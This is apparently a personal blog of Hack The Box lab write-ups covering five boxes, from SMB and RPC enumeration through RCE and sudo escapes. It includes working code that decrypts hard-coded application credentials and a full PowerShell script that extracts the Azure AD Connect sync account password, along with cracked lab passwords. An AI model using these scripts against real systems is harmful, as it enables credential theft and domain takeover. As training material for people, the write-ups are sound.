Nest

One of VbScrub's Windows boxes; it focuses heavily on reversing .NET applications to recover hard-coded credentials.

Run Nmap

Only 445 is open? Let's run again with the -p- flag to confirm; this feels like another evil-winrm box.

Foothold Enumeration

Running a quick nmap scan for vulnerabilities doesn’t give us anything.

We get the hostname.

Enum4Linux doesn’t get us much, access is denied for most checks.

smbclient lists the shares, so let's play around and see what's here.

We can access Secure$ but not the actual files inside it.

We don’t have access to any of the Users directories.

And SMBmap doesn’t give us anything to work with.

We switch to Windows, map the share as a drive to run through it quickly, and find the foothold credentials in the Data share.

And we have our foothold with the TempUser account.

User enumeration

We have greater access as TempUser, so let's keep going through the files.

The Notepad++ config keeps a recent-files history, and it shows C.Smith opening a file under \Secure$\.

We can't list the IT folder, but we know Carl\ exists.

We take a chance on browsing straight to Carl's directory and, awesome, we have permissions on it. Let's see what's in here.

The first few files are useless, but it looks like Carl has hard-coded some credentials for a VB program that reads RU_Config.xml.

We can see many Public Property Username/Password references in different files, but nothing we can use directly.

We find the RU_Config.xml file in the Data share.

Sure enough we find the user and an encrypted password. None of the files we saw earlier had extra information for us, but we did find some VB source files that seem relevant. We go through them and find the cryptography functions.

Key pieces of information we will need are:

    dim cipherText As String="fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
    dim passPhrase As String="N3st22"
    dim saltValue As String="88552299"
    dim passwordIterations AS INTEGER=2 
    dim initVector As String="464R5DFA5DL6LE28"
    dim keySize AS INTEGER=256

So we now have the information we need: we know how the tool encrypts and decrypts passwords, and we have the hard-coded passphrase, salt and IV. With only 2 PBKDF2 iterations and every input baked into the binary, the "encryption" is just obfuscation for anyone holding the executable. We build the code below in Visual Studio, using the RU-Scanner code as the base.

Imports System
Imports System.IO
Imports System.Text
Imports System.Security.Cryptography
Imports System.Text.Encoding
Imports Microsoft.VisualBasic
Module Program
    Sub Main()
        Dim cipherText As String = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
        Dim passPhrase As String = "N3st22"
        Dim saltValue As String = "88552299"
        Dim passwordIterations As Integer = 2
        Dim initVector As String = "464R5DFA5DL6LE28"
        Dim keySize As Integer = 256

        Dim initVectorBytes As Byte()
        initVectorBytes = System.Text.Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = System.Text.Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = System.Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount)

        ' Print() is the legacy VB file-output function; write to the console instead
        Console.WriteLine(plainText)
    End Sub
End Module

Running this we see the password is xRxRxPANCAK3SxRxRx.

We have the user flag.

Enumerating User 2

Now that we have the second user, let's go back to enumerating the SMB shares. SMB is still the only service we can use; the box is fun but very CTF-ish.

Looks like there is a port open for HQK queries that our first nmap scan missed.

Running strings against the HQKLDAP.exe file we found doesn't give us much, but when we disassemble it we see the version is 1.2.0. Googling suggests this isn't a real product, so we shouldn't expect public exploits.

Decompiling the exe and going through the code doesn't give us any answers.

The nmap scan on that port returns a banner listing commands we can send to the service. Maybe telnet is the answer here?


So we have a simple interface to this service through telnet. There is an option to debug the service, but it needs a password. Carl's password doesn't work, so we go back to the empty text file we found and check whether it holds the password.

After poking around with the file we find a handy smbclient command, allinfo, which shows two NTFS streams on the file, including a Password stream of 15 bytes. That is an alternate data stream, which is why the file looked empty: dir and a normal get only show the default :$DATA stream.

We retrieve that stream and have what looks like a password: WBQ201953D8w. Let's try it with telnet first; if it isn't accepted we will need to check the exe code to see what we need to do.
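Added example, not part of the original write-up: the second stream smbclient's allinfo reported is an NTFS alternate data stream, and the PowerShell below (my own, using a constructed test file; the file and stream names are made up) lists and reads such streams once a share is mapped as a drive, which is the check that turns an "empty" file into a finding.

```powershell
# Added example: enumerate NTFS alternate data streams on a file.
function Get-HiddenStreams {
    param([Parameter(Mandatory)][string] $Path)
    # Get-Item -Stream * lists every stream; ':$DATA' is the ordinary file content,
    # anything else is an ADS that dir, type and Explorer will not show.
    Get-Item -LiteralPath $Path -Stream * |
        Where-Object { $_.Stream -ne ':$DATA' } |
        ForEach-Object {
            [pscustomobject]@{
                File    = $Path
                Stream  = $_.Stream
                Bytes   = $_.Length
                Content = Get-Content -LiteralPath $Path -Stream $_.Stream -Raw
            }
        }
}

# Constructed test file: zero bytes of visible content, a 'Password' stream attached.
$tmp = Join-Path $env:TEMP 'constructed-empty.txt'
New-Item -Path $tmp -ItemType File -Force | Out-Null
Set-Content -LiteralPath $tmp -Stream 'Password' -Value 'constructed-example' -NoNewline

(Get-Item -LiteralPath $tmp).Length          # 0: looks empty to a normal listing
Get-HiddenStreams -Path $tmp | Format-Table -AutoSize

# Sweeping a whole mapped share (assumed drive letter Z:) for hidden streams:
# Get-ChildItem -Path Z:\ -Recurse -File -ErrorAction SilentlyContinue |
#     ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * } |
#     Where-Object { $_.Stream -ne ':$DATA' } | Select-Object FileName, Stream, Length
```

From Linux the same data is reachable with smbclient's get "file:stream", which is what the write-up does next; the point of the sweep is to do it for every file rather than only the one that looked suspicious.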

It is accepted. We have 3 new commands, Service, Session and ShowQuery.

So we can see some info on the queries but nothing that helps us, and we cannot leave the 1-3 range of the app.

We can't seem to run any of these queries.

We also can't navigate to the network location. Let's review the decompiled exe we found in Carl's home directory again. We see a cryptography section in the code that mimics the functionality we used to get user, but the passphrase, IV, salt and iteration count are slightly different. Even knowing how to decrypt, we still need to find the encrypted password itself.

After scratching our heads for a while we realise we can use the showquery, list and setdir commands to navigate around the application directory, and doing this we find the administrator credentials, including an encrypted password: yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Decrypt
{
    class decrypt
    {
        static void Main(string[] args)
        {
            string cipherText = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=";
            string passPhrase = "667912";
            string saltValue = "1313Rf99";
            int passwordIterations = 3;
            string initVector = "1L1SA61493DRV53Z";
            int keySize = 256;

            byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
            byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
            byte[] buffer = Convert.FromBase64String(cipherText);
            byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked((int)Math.Round(unchecked((double)keySize / 8.0))));
            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
            cryptoServiceProvider.Mode = CipherMode.CBC;
            ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
            MemoryStream memoryStream = new MemoryStream(buffer);
            CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, decryptor, CryptoStreamMode.Read);
            byte[] numArray = new byte[checked(buffer.Length + 1)];
            int count = cryptoStream.Read(numArray, 0, numArray.Length);
            memoryStream.Close();
            cryptoStream.Close();
            string v = Encoding.ASCII.GetString(numArray, 0, count);
            string plaintext = v;
            Console.WriteLine(v);
         }
    }
}

We put together this C# code using the decompiled source as a base, and run it.

Success, the administrator password is XtH4nkS4Pl4y1nGX.
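As an added example (my own code, not the RU-Scanner or HqkLdap source and not part of the original write-up), here is the decryption routine both programs share as one PowerShell function built on the same .NET classes the binaries call, parameterised on the constants pulled from each executable so that a single function covers both the RU_Config.xml password and the HQK administrator password above. The function and parameter names are my own.

```powershell
# Added example: one decryptor for both Nest binaries, driven by the constants
# recovered from each (PBKDF2-HMAC-SHA1 via Rfc2898DeriveBytes, then AES-CBC).
function Unprotect-NestSecret {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $CipherText,   # base64 value from the config file
        [Parameter(Mandatory)] [string] $PassPhrase,   # hard-coded in the binary
        [Parameter(Mandatory)] [string] $Salt,         # hard-coded in the binary
        [Parameter(Mandatory)] [string] $InitVector,   # hard-coded; must be 16 ASCII chars
        [int] $Iterations = 2,
        [int] $KeySize    = 256
    )

    $ivBytes   = [System.Text.Encoding]::ASCII.GetBytes($InitVector)
    $saltBytes = [System.Text.Encoding]::ASCII.GetBytes($Salt)
    $blob      = [System.Convert]::FromBase64String($CipherText)

    if ($ivBytes.Length -ne 16)  { throw "IV must be 16 bytes, got $($ivBytes.Length)" }
    if ($blob.Length % 16 -ne 0) { throw "ciphertext length $($blob.Length) is not a multiple of the AES block size" }

    # Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1. With 2 or 3 iterations and a fixed
    # salt the passphrase is the only secret, and it ships inside the exe.
    $kdf = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($PassPhrase, $saltBytes, $Iterations)
    $key = $kdf.GetBytes([int]($KeySize / 8))

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    try {
        $decryptor = $aes.CreateDecryptor($key, $ivBytes)
        # TransformFinalBlock strips the PKCS7 padding; a wrong key or IV normally
        # surfaces here as a CryptographicException ("Padding is invalid").
        $plain = $decryptor.TransformFinalBlock($blob, 0, $blob.Length)
    } finally {
        $aes.Dispose()
    }
    [System.Text.Encoding]::ASCII.GetString($plain)
}

# Constants exactly as recovered from the two binaries on the box.
$ruScanner = @{ PassPhrase = 'N3st22'; Salt = '88552299'; InitVector = '464R5DFA5DL6LE28'; Iterations = 2 }
$hqkLdap   = @{ PassPhrase = '667912'; Salt = '1313Rf99'; InitVector = '1L1SA61493DRV53Z'; Iterations = 3 }

Unprotect-NestSecret -CipherText 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=' @ruScanner   # C.Smith
Unprotect-NestSecret -CipherText 'yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=' @hqkLdap     # Administrator
```

Splatting the per-binary constants keeps the ciphertext as the only thing that changes between calls, so if a third config file turns up during enumeration it is a one-liner to try both parameter sets against it.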


We log in with this credential and are able to get the root flag!

The big lessons learned here, which cost me a lot of time, were firstly to enumerate all the things and make note of findings that might not be used until later, and secondly to learn more about the applications I am using, even custom applications, as that can help with enumeration.

Traverxec

This box is a mixture of CVEs, misconfigurations and GTFOBins.

Run Nmap

A quick scan shows us a web server and SSH are open. We will run a more intensive scan to double check and get dirb running. We also see the web server is Nostromo 1.9.6. While those scans run, let's research this.

Run Dirb

Nostromo exploit

We see an RCE: https://www.exploit-db.com/exploits/47837 and https://git.sp0re.sh/sp0re/Nhttpd-exploits

Let's give CVE-2019-16278 a try.

We have RCE! 😊 Let's try and get a shell before proceeding. Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md as a guide we try for a bash reverse shell.

We set up a simple Python web server to host our shell.

We are able to upload our shell to /tmp

We run it

And we get a shell! Time to move to user enumeration.

Enumerating for user

We see our target user David.

Going through the server bit by bit we see the Nostromo config file, and this gives us a lot of good info: the server admin name and the location of the password in .htpasswd.

We have the password hash, now let's crack it!

Running john on the hash gets us the password: Nowonly4me

We aren't able to SSH with these credentials, so they must be for something else. Let's keep looking.

Checking the man page for nostromo, it looks like we can reach users' home directories because of how the server is set up (the homedirs option). Let's try it.

The web page itself gave us nothing, and after tearing our hair out for several hours we try to cd directly to the directory... and it works. Ouch.

Going through the public_www folder we find a subdirectory that is quite interesting. It looks like we have an archived SSH key; let's extract it and get David's private key.

We have issues running john to crack the password-protected RSA key; after some googling we find a script that runs a dictionary attack against the file, and the password for the private key is hunter. Let's try to SSH as David now.

We have user.txt and SSH access as David!

Enumerating to root.

Shortly after starting to explore as David we find a shell script that runs journalctl via sudo. Dusting off our trusty GTFOBins spellbook we find the incantation we need: https://gtfobins.github.io/gtfobins/journalctl/

After some playing around we identify the correct place to enter the GTFOBins command (journalctl hands its output to a pager, and the pager can spawn a shell that inherits root) and get a root shell. Happy days.

Interesting box: foothold and root were easy, but user took ages to figure out!

Monteverde

This is an interesting box that mixed lazy admins with the risks of cloud based authentication.

Run nmap

For the first time in HTB nmap says the host is down. Wonder if somebody has been messing with the box or it's part of the challenge. Let's force nmap to scan anyway with the -Pn flag (skip host discovery).

Interesting, most services come back as tcpwrapped. We can tell LDAP, SMB, DNS and Kerberos are open from the port numbers, but version detection is being obscured. As this seems to be a Windows box, let's enumerate with enum4linux and follow up findings with impacket to see if we can find a way in.

Enum4linux

A decent bit of information: we now have users, including a juicy-sounding SABatchJobs account, the domain and some groups. Maybe we should try some Kerberoasting like we learned about with Sauna.

Kerberos enumeration

Reviewing the blog https://www.tarlogic.com/en/blog/how-to-attack-kerberos/, let's use kerbrute to confirm the usernames.

Impacket and Kerberoasting seem to be a dead end, so let's try enumerating some more with SMB.

SMB enumeration.

We confirm SMB is running with CME and an additional nmap scan. We recently came across rpcclient, which gives us a null-session RPC connection we can enumerate from. Using this guide, we proceed: https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/

We find additional information on privileges and are able to drill down into the user accounts we found previously. Only 3 accounts have logged in before, so let's focus on those as we know they are in use.

SMB bruteforce

After playing around with these 3 usernames and running into issues with both MSF and CME, trying rockyou as the password list didn't work for us until we started trying the usernames as passwords and found SABatchJobs' password was SABatchJobs. Bighead would be proud.

We did spend about 3 hours trying to get smbclient to work (the quarantine and coffee shortages are having an impact on my life), but luckily literally the first thing we checked has the second user's password, mhope. I am a ball of luck right now! 😊 When we ran CME for WinRM we found it was open, so using evil-winrm, a tool we used in a previous HTB, we can try for a shell.

Looks like we are successful.

And we have user.

Evil-Winrm enumeration

Starting to enumerate over WinRM we check the services and see the big ones on this box are SQL Server and Azure AD Connect. We will need to enumerate with some scripts though.

We upload PowerSploit, and Sherlock.

None of these tools give us anything to work with; the box seems solid.

A friend reminds us to use the /all parameter for whoami, and it shows that mhope is in the MEGABANK\Azure Admins group. This stands out as suspicious. But let's enumerate SQL Server first as it seems more likely than Azure.

Enumerating SQL Server

We can see this is SQL Server so let's focus on that. Googling gives us an enumeration guide we will use, as SQL Server and I are not a good match 😮

Trying to use MSF to log in as mhope doesn't work; it seems mhope isn't allowed to access SQL. Going back to researching what we found so far, a wild blog suddenly appears that chains our two findings together: https://vbscrub.video.blog/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ Best of all, VbScrub wrote it, who is a very good hacker and always offers awesome advice on the HTB forums.

The exploit

We read through the original research VbScrub linked to, https://blog.xpnsec.com/azuread-connect-for-redteam/, and use the code there to create a ps1 file; reading through it, nothing seems to need changing. Now let's upload it over WinRM and execute it and see what happens.

We upload it as normal, and when we run it evil-winrm cuts out. We didn't think of this at the time, but we should have loaded the script as a module in evil-winrm; we didn't realise our mistake. We did notice it was showing the file being executed from my Kali machine. Reading back over the blog we see that “you also need to make sure the mcrypt.dll from the download link is in the same directory the program is in.” We try this and also try adding mcrypt.dll to our path, but neither works; it keeps cutting out.

We decided to run the following code, which we found, line by line. It differs from the above in that it hard-codes the mcrypt.dll location:

$server = "localhost"   # assumed: the ADSync SQL instance is local to the box
$db = "ADSync"          # default Azure AD Connect database name
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = $server; Database = $db; Initial Catalog=$db; Integrated Security = True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

"[+] Domain:  " + $domain.Domain
"[+] Username: " + $username.Username
"[+]Password: " + $password.Password

This is pretty awesome, we get the credentials. The security-relevant point: Azure AD Connect keeps the on-prem account it syncs with (here the domain administrator) encrypted in its local ADSync database, and the keyset needed to decrypt it is retrievable through mcrypt.dll by anyone who can read that database. Membership of the Azure Admins group was enough for that read.

And we are admin with the root.txt 🙂

OpenAdmin

Run NMAP

As always nmap is the first tool we use, and we see only 2 ports open, 22 and 80. Bleh, it's a website box ☹ I hate webapp pentesting.

Run Dirb

Since it's a web app we run dirb and wfuzz to map out the site; using two tools lets us see if either finds something the other missed. What we can see is this box is running 3 separate sites: art, music and tech. Given the name of the box I'm assuming it's mimicking a multi-tenant hosting company and our way in will be the hosting provider's admin page. So far we haven't found this, so let's try dirbuster with the medium list.

Dirbuster with the medium list shows an /ona/ directory which didn't appear in the previous tools, which shows the importance of using multiple tools. This directory is how the site is managed, with a tool called OpenNetAdmin v18.1.1, which has a known RCE.

Run Nikto

While the dirbuster scan was running we ran Nikto just in case, but unfortunately it is not our way in. Trying to fuzz the site also doesn't work.

Check the services

Nikto did show us that the Apache version is out of date, so we check the vulnerabilities for that version: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-241078/Apache-Http-Server-2.4.29.html

One vulnerability catches our eye, https://www.exploit-db.com/exploits/42745, but it is unlikely this is the way forward.

OpenNetAdmin seems the way to go, with 2 potential exploits including an MSF command injection module. Let's see if it works.

It doesn’t work for us. Interesting.

Downloading the script from Exploit-DB and loading it into MSF manually also doesn't work, so let's try the other script searchsploit pointed us to.

This one works and gives us a basic shell. Basic commands work, so let's enumerate what we can. Cat all the things 😊

So it looks like we could use the dcm CLI to run SQL commands, maybe: https://github.com/opennetadmin/dcm

Alas, dcm failed us; we couldn't run SQL commands through it, but we did find the SQL username in /var/log/ona.log. Let's enumerate some more.

After much searching we find the DB login and password, n1nj4W4rri0R!, in one of the subdirectories of where our shell started. Never forget to check what's close to home, I guess.

We also have two users. Let's try the DB password on the user accounts and see if we can SSH.

And we have jimmy, to the sound of applause!

A friend introduced us to a Linux enumeration script we want to try: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

LinEnum.sh goes through a massive amount of enumeration and gives some great information, but for this box there are no interesting findings.

When checking out /var/www we find a separate “internal” web site. Let's check out these files.

We can see jimmy's hashed password is stored in index.php but not Joanna's; Joanna's access uses an SSH key, which main.php cats to the output.

We can see Joanna's SSH key will be printed if we can run main.php, but we don't seem to have the permissions to run it ourselves. Checking Apache's config, Internal is an enabled site with the server name internal.openadmin.htb. So let's curl the server name instead of the IP. Curling the hostname didn't work for us.

But on re-reading the config file we see it is listening on a particular localhost:port; when we curl this we get the RSA private key.

We can see that the RSA key is encrypted with a passphrase. We try jimmy's password, because of the ninja hint in the web page, but it doesn't work. We can see the passphrase is crackable by checking the header, DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6: this is the legacy PEM key format, which derives the key from the passphrase with a single MD5 pass, so it cracks quickly. Using ssh2john to convert the file to a john-crackable format, we get the passphrase, bloodninjas. This is the same process we used for Postman.

Now we are in as Joanna and we have the user flag.

Checking sudo -l we can see Joanna can execute nano on a particular file as root. A friend recently introduced us to GTFOBins, a catalogue of ways to abuse this type of privilege. Let's use the nano entry to break out to a shell as per here: https://gtfobins.github.io/gtfobins/nano/#shell

Sure enough, running sudo /bin/nano /opt/priv and using the GTFOBins sequence saves our bacon and we get the root flag.

Happy days we have evolved into a script kiddy 🙂

Sauna

Run nmap.

Review interesting findings

  • 9389/tcp – Active directory web services
  • 445/139/tcp – SMB ports, let's run smbmap
  • 80/tcp – web server, let's run dirb on it.
  • 3268/tcp – LDAP requests sent to port 3268 can be used to search for objects in the entire forest for the global catalog
  • 464/tcp – kpasswd – A vulnerability has been reported in Kerberos, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to the kpasswd application not properly handling malformed UDP packets and can be exploited to exhaust CPU and network resources via the UDP “ping-pong” attack on port 464.
    References: [CVE-2002-2443], [SECUNIA-53375]
  • 389/tcp – LDAP
  • 593/tcp – MS Security Bulletin [MS03-026] outlines a critical Buffer Overrun RPC vulnerability that can be exploited via ports 135, 139, 445, 593 (or any other specifically configured RPC port). You should filter the above mentioned ports at the firewall level and not allow RPC over an unsecure network, such as the Internet.
  • 135/tcp – Remote Procedure Call (RPC) 
  • 88/tcp – KDC (Kerberos key distribution center) server.
  • 5985/tcp – WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default.

We can see many interesting ports to look at; the box seems to be LDAP/AD/Kerberos focused. We also hit an nmap segmentation fault:

Checking the services

smbmap doesn't give us much to work with here.

Not much from dirb either; it looks like a pretty flat site. We have a lot of other choices to check, but let's spin up Sparta to try to narrow down our options before we take the next step with the AD/LDAP/Kerberos enumeration. Let's see if it gives us alternative options.

While Sparta is running we will also set up OpenVAS on our machine using the guide here: https://hackertarget.com/install-openvas-gvm-on-kali/

root@kali:~# apt update
root@kali:~# apt install openvas
root@kali:~# openvas-setup
root@kali:~# greenbone-scapdata-sync
root@kali:~# openvas-adduser
root@kali:~# gsd
[*] Creating admin user
User created with password '73a95e20-b3fd-4e77-9b6f-247a49ff695e'.

While these scans run we read up on Kerberos here: https://www.tarlogic.com/en/blog/how-kerberos-works/ This blog leads us to an interesting attack which matches the box's name, https://attack.mitre.org/techniques/T1208/ (Kerberoasting), but we need a domain account to do it. So let's try to get one with some further enumeration.

A good amount of information: usernames, including guest, plus the domain name. Going back to the site itself we find some more names:

We can also see many blog posts from the user Admin. Finally, using CME we can find some additional information.

Vulnerability Detection Result

Here is the list of DCE/RPC or MSRPC services running on this host via the TCP protocol:
Port: 49664/tcp
     UUID: d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49664]
Port: 49665/tcp
     UUID: f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49665]
     Annotation: Event log TCPIP
Port: 49666/tcp
     UUID: 3a9ef155-691d-4449-8d05-09ad57031823, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49666]
     UUID: 86d35949-83c9-4044-b424-db363231fd0c, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49666]
Port: 49667/tcp
     UUID: 0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Annotation: RemoteAccessCheck
     UUID: 12345678-1234-abcd-ef00-01234567cffb, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Named pipe : lsass
     Win32 service or process : Netlogon
     Description : Net Logon service
     UUID: 12345778-1234-abcd-ef00-0123456789ab, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : LSA access
     UUID: 12345778-1234-abcd-ef00-0123456789ac, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : SAM access
     UUID: c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Annotation: Impl friendly name
     UUID: e3514235-4b06-11d1-ab04-00c04fc2dcd2, version 4
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Annotation: MS NT Directory DRS Interface
Port: 49673/tcp
     UUID: 0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7, version 0
     Endpoint: ncacn_http:10.10.10.175[49673]
     Annotation: RemoteAccessCheck
     UUID: 12345678-1234-abcd-ef00-01234567cffb, version 1
     Endpoint: ncacn_http:10.10.10.175[49673]
     Named pipe : lsass
     Win32 service or process : Netlogon
     Description : Net Logon service
     UUID: 12345778-1234-abcd-ef00-0123456789ab, version 0
     Endpoint: ncacn_http:10.10.10.175[49673]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : LSA access
     UUID: e3514235-4b06-11d1-ab04-00c04fc2dcd2, version 4
     Endpoint: ncacn_http:10.10.10.175[49673]
     Annotation: MS NT Directory DRS Interface
Port: 49674/tcp
     UUID: 0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Annotation: RemoteAccessCheck
     UUID: 12345678-1234-abcd-ef00-01234567cffb, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Named pipe : lsass
     Win32 service or process : Netlogon
     Description : Net Logon service
     UUID: 12345778-1234-abcd-ef00-0123456789ab, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : LSA access
     UUID: 12345778-1234-abcd-ef00-0123456789ac, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : SAM access
     UUID: e3514235-4b06-11d1-ab04-00c04fc2dcd2, version 4
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Annotation: MS NT Directory DRS Interface
Port: 49675/tcp
     UUID: 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     UUID: 12345678-1234-abcd-ef00-0123456789ab, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     Named pipe : spoolss
     Win32 service or process : spoolsv.exe
     Description : Spooler service
     UUID: 4a452661-8290-4b36-8fbe-7f4093a94978, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     UUID: 76f03f96-cdfd-44fc-a22c-64950a001209, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     UUID: ae33069b-a2a8-46ee-a235-ddfd339be281, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
Port: 49678/tcp
     UUID: 367abb81-9844-35f1-ad32-98f038001003, version 2
     Endpoint: ncacn_ip_tcp:10.10.10.175[49678]
Port: 49686/tcp
     UUID: 50abc2a4-574d-40b3-9d66-ee4fd5fba076, version 5
     Endpoint: ncacn_ip_tcp:10.10.10.175[49686]
     Named pipe : dnsserver
     Win32 service or process : dns.exe
     Description : DNS Server
Port: 49696/tcp
     UUID: 897e2e5f-93f3-4376-9c9c-fd2277495c27, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49696]
     Annotation: Frs2 Service

CME doesn't show us much, and our OpenVAS scan hasn't given us any vulnerabilities to exploit, though we did get additional enumeration information (the DCE/RPC endpoint listing above). I think this is the extent of the info we will get, so let's start trying to get in using https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ and https://pentestlab.blog/2018/06/04/spn-discovery/

We will need a valid user, so we create a user list using cewl and edit it to include the names above in the standard employee username formats. Ever wonder why your employer doesn't just use $Firstname.$Lastname? Now you know!
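An added example of that list-building step, my own code rather than the write-up's: it expands scraped full names into the username formats Windows domains commonly use, so kerbrute userenum or GetNPUsers.py can test them all. The function name and the sample names are constructed.

```powershell
# Added example: expand "First Last" names into candidate domain usernames.
function ConvertTo-UsernameCandidates {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string] $FullName
    )
    process {
        $parts = $FullName.Trim().ToLower() -split '\s+'
        if ($parts.Count -lt 2) { return }        # need at least a first and last name
        $first = $parts[0]; $last = $parts[-1]    # middle names are ignored
        $f = $first.Substring(0, 1); $l = $last.Substring(0, 1)
        # Each line is one common convention; a domain normally uses exactly one,
        # so once a hit confirms the format the rest of the list can be pruned.
        @(
            "$first.$last", "$first$last", "${first}_$last", "$first-$last"   # frank.smith
            "$f$last", "$f.$last", "${f}_$last"                               # fsmith / f.smith
            "$first$l", "$last$f", "$last.$first", "$last$first"              # frans / smithf
            $first, $last                                                     # bare names
        )
    }
}

# Constructed sample input standing in for the names cewl and the site gave us.
$scrapedNames = @('Frank Smith', 'Hannah Smith', 'Bob Example')
$scrapedNames | ConvertTo-UsernameCandidates | Sort-Object -Unique | Set-Content users.txt

# users.txt is now ready for: kerbrute userenum -d <domain> --dc <dc-ip> users.txt
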